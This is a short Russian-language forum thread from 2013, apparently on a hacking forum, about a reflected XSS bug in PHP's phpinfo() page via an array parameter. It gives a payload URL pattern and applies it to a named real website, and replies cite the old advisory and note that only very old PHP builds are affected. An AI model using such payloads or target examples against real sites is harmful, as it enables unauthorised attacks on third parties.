Просмотр полной версии : Xss в phpinfo().
psihoz26
04.11.2013, 02:59
Не нашел про данную уязвимoсть ничего на форуме и поэтому решил запостить.
Формат уязвимой ссылки:
Code:
httр://site.com/phpinfo.php?a[]=alert('xss')
Пример:
Code:
http://www.infineform.com/info.php?a[]=alert('xss')
WallHack
04.11.2013, 11:51
Я на хостинге сайтов находил phpinfo надо проверить на XSS )
Это старая бага:
http://www.php-security.org/MOPB/MOPB-08-2007.html
http://www.exploit-db.com/exploits/3405/
На том сайте что ты скинул для примера
Code:
Build Date Sep 28 2005 12:31:10
Версия правда 5.0.4, а пишут что только четвёртая ветка уязвима.
Короче будет работать только на очень старых версиях PHP.
В четвертых версиях еще запатчили. Странно, почему на 5.0.4 вообще работает. Может не в четвертой, а в ранних версиях пятой.
t3cHn0iD
04.11.2013, 15:11
Мда.Какая глобальная и "новая" уязвимость.
psihoz26
20.11.2013, 17:03
Я нигде не писал что уязвимость новая и что я её лично нашёл.
Не все же знали про эту уязвимость и на форуме не было упоминания её.
Кому надо взяли на заметку.
vBulletin® v3.8.14, Copyright ©2000-2026, vBulletin Solutions, Inc. Перевод: zCarot